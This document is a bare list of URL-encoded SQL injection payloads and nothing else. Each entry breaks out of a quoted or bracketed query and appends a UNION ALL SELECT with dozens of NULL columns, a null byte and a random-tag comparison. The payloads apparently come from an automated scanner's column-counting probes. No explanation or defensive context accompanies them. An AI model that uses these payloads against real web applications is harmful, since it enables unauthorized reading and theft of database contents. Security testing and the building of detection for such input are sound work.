1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27UoSi%27%20LIKE%20%27UoSi 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27DGMN%27%20LIKE%20%27DGMN 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fSLo%27%20LIKE%20%27fSLo 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27AXyT%27%20LIKE%20%27AXyT 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fzAp%27%20LIKE%20%27fzAp 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27bRmO%27%20LIKE%20%27bRmO 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27szxb%27%20LIKE%20%27szxb 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ikww%27%20LIKE%20%27ikww 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Tekj%27%20LIKE%20%27Tekj 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27QoPJ%27%20LIKE%20%27QoPJ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27EPgh%27%20LIKE%20%27EPgh 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27HQhl%27%20LIKE%20%27HQhl 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Lfry%27%20LIKE%20%27Lfry 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Lsef%27%20LIKE%20%27Lsef 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27nRIb%27%20LIKE%20%27nRIb 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22mcCc%22%3D%22mcCc 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22mYyq%22%3D%22mYyq 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22PiaV%22%3D%22PiaV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22AzlD%22%3D%22AzlD 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22gbyS%22%3D%22gbyS 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22AWGN%22%3D%22AWGN 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22OfSX%22%3D%22OfSX 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22ihcK%22%3D%22ihcK 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22Yuzp%22%3D%22Yuzp 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22LeIP%22%3D%22LeIP 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22xfTV%22%3D%22xfTV 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22LExa%22%3D%22LExa 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22plWY%22%3D%22plWY 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ImFC%22%3D%22ImFC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22jdRR%22%3D%22jdRR 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22fTQq%22%3D%22fTQq 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22Yyzt%22%3D%22Yyzt 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22xSNU%22%3D%22xSNU 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22QDxY%22%3D%22QDxY 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22xlpu%22%3D%22xlpu 